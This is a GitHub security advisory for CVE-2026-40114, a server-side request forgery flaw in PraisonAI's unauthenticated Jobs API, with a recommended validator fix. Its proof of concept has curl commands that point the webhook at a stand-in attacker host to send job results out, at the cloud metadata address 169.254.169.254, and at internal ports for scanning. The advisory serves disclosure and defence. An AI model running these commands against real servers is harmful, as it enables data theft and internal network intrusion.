GHSA-8FRJ-8Q3M-XHGM
Vulnerability from github – Published: 2026-04-10 19:28 – Updated: 2026-04-10 19:28Summary
The /api/v1/runs endpoint accepts an arbitrary webhook_url in the request body with no URL validation. When a submitted job completes (success or failure), the server makes an HTTP POST request to this URL using httpx.AsyncClient. An unauthenticated attacker can use this to make the server send POST requests to arbitrary internal or external destinations, enabling SSRF against cloud metadata services, internal APIs, and other network-adjacent services.
Details
The vulnerability exists across the full request lifecycle:
1. User input accepted without validation — models.py:32:
class JobSubmitRequest(BaseModel):
webhook_url: Optional[str] = Field(None, description="URL to POST results when complete")
The field is a plain str with no URL validation — no scheme restriction, no host filtering.
2. Stored directly on the Job object — router.py:80-86:
job = Job(
prompt=body.prompt,
...
webhook_url=body.webhook_url,
...
)
3. Used in an outbound HTTP request — executor.py:385-415:
async def _send_webhook(self, job: Job):
if not job.webhook_url:
return
try:
import httpx
payload = {
"job_id": job.id,
"status": job.status.value,
"result": job.result if job.status == JobStatus.SUCCEEDED else None,
"error": job.error if job.status == JobStatus.FAILED else None,
...
}
async with httpx.AsyncClient(timeout=30.0) as client:
response = await client.post(
job.webhook_url, # <-- attacker-controlled URL
json=payload,
headers={"Content-Type": "application/json"}
)
4. Triggered on both success and failure paths — executor.py:180-205:
# Line 180-181: on success
if job.webhook_url:
await self._send_webhook(job)
# Line 204-205: on failure
if job.webhook_url:
await self._send_webhook(job)
5. No authentication on the Jobs API server — server.py:82-101:
The create_app() function creates a FastAPI app with CORS allowing all origins (["*"]) and no authentication middleware. The jobs router is mounted directly with no auth dependencies.
There is zero URL validation anywhere in the chain: no scheme check (allows http://, https://, and any scheme httpx supports), no private/internal IP filtering, and no allowlist.
PoC
Step 1: Start a listener to observe SSRF requests
# In a separate terminal, start a simple HTTP listener
python3 -c "
from http.server import HTTPServer, BaseHTTPRequestHandler
import json
class Handler(BaseHTTPRequestHandler):
def do_POST(self):
length = int(self.headers.get('Content-Length', 0))
body = self.rfile.read(length)
print(f'Received POST from PraisonAI server:')
print(json.dumps(json.loads(body), indent=2))
self.send_response(200)
self.end_headers()
HTTPServer(('0.0.0.0', 9999), Handler).serve_forever()
"
Step 2: Submit a job with a malicious webhook_url
# Point webhook to attacker-controlled server
curl -X POST http://localhost:8005/api/v1/runs \
-H 'Content-Type: application/json' \
-d '{
"prompt": "say hello",
"webhook_url": "http://attacker.example.com:9999/steal"
}'
Step 3: Target internal services (cloud metadata)
# Attempt to reach AWS metadata service
curl -X POST http://localhost:8005/api/v1/runs \
-H 'Content-Type: application/json' \
-d '{
"prompt": "say hello",
"webhook_url": "http://169.254.169.254/latest/meta-data/"
}'
Step 4: Internal network port scanning
# Scan internal services by observing response timing
for port in 80 443 5432 6379 8080 9200; do
curl -s -X POST http://localhost:8005/api/v1/runs \
-H 'Content-Type: application/json' \
-d "{
\"prompt\": \"say hello\",
\"webhook_url\": \"http://10.0.0.1:${port}/\"
}"
done
When each job completes, the server POSTs the full job result payload (including agent output, error messages, and execution metrics) to the specified URL.
Impact
-
SSRF to internal services: The server will send POST requests to any host/port reachable from the server's network, allowing interaction with internal APIs, databases, and cloud infrastructure that are not meant to be externally accessible.
-
Cloud metadata access: In cloud deployments (AWS, GCP, Azure), the server can be directed to POST to metadata endpoints (
169.254.169.254,metadata.google.internal), potentially triggering actions or leaking information depending on the metadata service's POST handling. -
Internal network reconnaissance: By submitting jobs with webhook URLs pointing to various internal hosts and ports, an attacker can discover internal services based on timing differences and error patterns in job logs.
-
Data exfiltration: The webhook payload includes the full job result (agent output), which may contain sensitive data processed by the agent. By pointing the webhook to an attacker-controlled server, this data is exfiltrated.
-
No authentication barrier: The Jobs API server has no authentication by default, meaning any network-reachable attacker can exploit this without credentials.
Recommended Fix
Add URL validation to restrict webhook URLs to safe destinations. In models.py, add a Pydantic validator:
from pydantic import BaseModel, Field, field_validator
from urllib.parse import urlparse
import ipaddress
class JobSubmitRequest(BaseModel):
webhook_url: Optional[str] = Field(None, description="URL to POST results when complete")
@field_validator("webhook_url")
@classmethod
def validate_webhook_url(cls, v: Optional[str]) -> Optional[str]:
if v is None:
return v
parsed = urlparse(v)
# Only allow http and https schemes
if parsed.scheme not in ("http", "https"):
raise ValueError("webhook_url must use http or https scheme")
# Block private/internal IP ranges
hostname = parsed.hostname
if not hostname:
raise ValueError("webhook_url must have a valid hostname")
try:
ip = ipaddress.ip_address(hostname)
if ip.is_private or ip.is_loopback or ip.is_link_local or ip.is_reserved:
raise ValueError("webhook_url must not point to private/internal addresses")
except ValueError as e:
if "must not point" in str(e):
raise
# hostname is not an IP — resolve and check
pass
return v
Additionally, in executor.py, add DNS resolution validation before making the request to prevent DNS rebinding:
async def _send_webhook(self, job: Job):
if not job.webhook_url:
return
# Validate resolved IP is not private (prevent DNS rebinding)
from urllib.parse import urlparse
import socket, ipaddress
parsed = urlparse(job.webhook_url)
try:
resolved_ip = socket.getaddrinfo(parsed.hostname, parsed.port or 443)[0][4][0]
ip = ipaddress.ip_address(resolved_ip)
if ip.is_private or ip.is_loopback or ip.is_link_local or ip.is_reserved:
logger.warning(f"Webhook blocked for {job.id}: resolved to private IP {resolved_ip}")
return
except (socket.gaierror, ValueError):
logger.warning(f"Webhook blocked for {job.id}: could not resolve {parsed.hostname}")
return
# ... proceed with httpx.AsyncClient.post() ...
{
"affected": [
{
"package": {
"ecosystem": "PyPI",
"name": "PraisonAI"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "4.5.128"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-40114"
],
"database_specific": {
"cwe_ids": [
"CWE-918"
],
"github_reviewed": true,
"github_reviewed_at": "2026-04-10T19:28:54Z",
"nvd_published_at": "2026-04-09T22:16:35Z",
"severity": "HIGH"
},
"details": "## Summary\n\nThe `/api/v1/runs` endpoint accepts an arbitrary `webhook_url` in the request body with no URL validation. When a submitted job completes (success or failure), the server makes an HTTP POST request to this URL using `httpx.AsyncClient`. An unauthenticated attacker can use this to make the server send POST requests to arbitrary internal or external destinations, enabling SSRF against cloud metadata services, internal APIs, and other network-adjacent services.\n\n## Details\n\nThe vulnerability exists across the full request lifecycle:\n\n**1. User input accepted without validation** \u2014 `models.py:32`:\n```python\nclass JobSubmitRequest(BaseModel):\n webhook_url: Optional[str] = Field(None, description=\"URL to POST results when complete\")\n```\nThe field is a plain `str` with no URL validation \u2014 no scheme restriction, no host filtering.\n\n**2. Stored directly on the Job object** \u2014 `router.py:80-86`:\n```python\njob = Job(\n prompt=body.prompt,\n ...\n webhook_url=body.webhook_url,\n ...\n)\n```\n\n**3. Used in an outbound HTTP request** \u2014 `executor.py:385-415`:\n```python\nasync def _send_webhook(self, job: Job):\n if not job.webhook_url:\n return\n try:\n import httpx\n payload = {\n \"job_id\": job.id,\n \"status\": job.status.value,\n \"result\": job.result if job.status == JobStatus.SUCCEEDED else None,\n \"error\": job.error if job.status == JobStatus.FAILED else None,\n ...\n }\n async with httpx.AsyncClient(timeout=30.0) as client:\n response = await client.post(\n job.webhook_url, # \u003c-- attacker-controlled URL\n json=payload,\n headers={\"Content-Type\": \"application/json\"}\n )\n```\n\n**4. Triggered on both success and failure paths** \u2014 `executor.py:180-205`:\n```python\n# Line 180-181: on success\nif job.webhook_url:\n await self._send_webhook(job)\n\n# Line 204-205: on failure\nif job.webhook_url:\n await self._send_webhook(job)\n```\n\n**5. No authentication on the Jobs API server** \u2014 `server.py:82-101`:\nThe `create_app()` function creates a FastAPI app with CORS allowing all origins (`[\"*\"]`) and no authentication middleware. The jobs router is mounted directly with no auth dependencies.\n\nThere is zero URL validation anywhere in the chain: no scheme check (allows `http://`, `https://`, and any scheme httpx supports), no private/internal IP filtering, and no allowlist.\n\n## PoC\n\n**Step 1: Start a listener to observe SSRF requests**\n```bash\n# In a separate terminal, start a simple HTTP listener\npython3 -c \"\nfrom http.server import HTTPServer, BaseHTTPRequestHandler\nimport json\n\nclass Handler(BaseHTTPRequestHandler):\n def do_POST(self):\n length = int(self.headers.get(\u0027Content-Length\u0027, 0))\n body = self.rfile.read(length)\n print(f\u0027Received POST from PraisonAI server:\u0027)\n print(json.dumps(json.loads(body), indent=2))\n self.send_response(200)\n self.end_headers()\n\nHTTPServer((\u00270.0.0.0\u0027, 9999), Handler).serve_forever()\n\"\n```\n\n**Step 2: Submit a job with a malicious webhook_url**\n```bash\n# Point webhook to attacker-controlled server\ncurl -X POST http://localhost:8005/api/v1/runs \\\n -H \u0027Content-Type: application/json\u0027 \\\n -d \u0027{\n \"prompt\": \"say hello\",\n \"webhook_url\": \"http://attacker.example.com:9999/steal\"\n }\u0027\n```\n\n**Step 3: Target internal services (cloud metadata)**\n```bash\n# Attempt to reach AWS metadata service\ncurl -X POST http://localhost:8005/api/v1/runs \\\n -H \u0027Content-Type: application/json\u0027 \\\n -d \u0027{\n \"prompt\": \"say hello\",\n \"webhook_url\": \"http://169.254.169.254/latest/meta-data/\"\n }\u0027\n```\n\n**Step 4: Internal network port scanning**\n```bash\n# Scan internal services by observing response timing\nfor port in 80 443 5432 6379 8080 9200; do\n curl -s -X POST http://localhost:8005/api/v1/runs \\\n -H \u0027Content-Type: application/json\u0027 \\\n -d \"{\n \\\"prompt\\\": \\\"say hello\\\",\n \\\"webhook_url\\\": \\\"http://10.0.0.1:${port}/\\\"\n }\"\ndone\n```\n\nWhen each job completes, the server POSTs the full job result payload (including agent output, error messages, and execution metrics) to the specified URL.\n\n## Impact\n\n1. **SSRF to internal services**: The server will send POST requests to any host/port reachable from the server\u0027s network, allowing interaction with internal APIs, databases, and cloud infrastructure that are not meant to be externally accessible.\n\n2. **Cloud metadata access**: In cloud deployments (AWS, GCP, Azure), the server can be directed to POST to metadata endpoints (`169.254.169.254`, `metadata.google.internal`), potentially triggering actions or leaking information depending on the metadata service\u0027s POST handling.\n\n3. **Internal network reconnaissance**: By submitting jobs with webhook URLs pointing to various internal hosts and ports, an attacker can discover internal services based on timing differences and error patterns in job logs.\n\n4. **Data exfiltration**: The webhook payload includes the full job result (agent output), which may contain sensitive data processed by the agent. By pointing the webhook to an attacker-controlled server, this data is exfiltrated.\n\n5. **No authentication barrier**: The Jobs API server has no authentication by default, meaning any network-reachable attacker can exploit this without credentials.\n\n## Recommended Fix\n\nAdd URL validation to restrict webhook URLs to safe destinations. In `models.py`, add a Pydantic validator:\n\n```python\nfrom pydantic import BaseModel, Field, field_validator\nfrom urllib.parse import urlparse\nimport ipaddress\n\nclass JobSubmitRequest(BaseModel):\n webhook_url: Optional[str] = Field(None, description=\"URL to POST results when complete\")\n\n @field_validator(\"webhook_url\")\n @classmethod\n def validate_webhook_url(cls, v: Optional[str]) -\u003e Optional[str]:\n if v is None:\n return v\n \n parsed = urlparse(v)\n \n # Only allow http and https schemes\n if parsed.scheme not in (\"http\", \"https\"):\n raise ValueError(\"webhook_url must use http or https scheme\")\n \n # Block private/internal IP ranges\n hostname = parsed.hostname\n if not hostname:\n raise ValueError(\"webhook_url must have a valid hostname\")\n \n try:\n ip = ipaddress.ip_address(hostname)\n if ip.is_private or ip.is_loopback or ip.is_link_local or ip.is_reserved:\n raise ValueError(\"webhook_url must not point to private/internal addresses\")\n except ValueError as e:\n if \"must not point\" in str(e):\n raise\n # hostname is not an IP \u2014 resolve and check\n pass\n \n return v\n```\n\nAdditionally, in `executor.py`, add DNS resolution validation before making the request to prevent DNS rebinding:\n\n```python\nasync def _send_webhook(self, job: Job):\n if not job.webhook_url:\n return\n \n # Validate resolved IP is not private (prevent DNS rebinding)\n from urllib.parse import urlparse\n import socket, ipaddress\n \n parsed = urlparse(job.webhook_url)\n try:\n resolved_ip = socket.getaddrinfo(parsed.hostname, parsed.port or 443)[0][4][0]\n ip = ipaddress.ip_address(resolved_ip)\n if ip.is_private or ip.is_loopback or ip.is_link_local or ip.is_reserved:\n logger.warning(f\"Webhook blocked for {job.id}: resolved to private IP {resolved_ip}\")\n return\n except (socket.gaierror, ValueError):\n logger.warning(f\"Webhook blocked for {job.id}: could not resolve {parsed.hostname}\")\n return\n \n # ... proceed with httpx.AsyncClient.post() ...\n```",
"id": "GHSA-8frj-8q3m-xhgm",
"modified": "2026-04-10T19:28:54Z",
"published": "2026-04-10T19:28:54Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-8frj-8q3m-xhgm"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-40114"
},
{
"type": "PACKAGE",
"url": "https://github.com/MervinPraison/PraisonAI"
},
{
"type": "WEB",
"url": "https://github.com/MervinPraison/PraisonAI/releases/tag/v4.5.128"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N",
"type": "CVSS_V3"
}
],
"summary": "PraisonAI Vulnerable to Server-Side Request Forgery via Unvalidated webhook_url in Jobs API"
}
Sightings
| Author | Source | Type | Date | Other |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.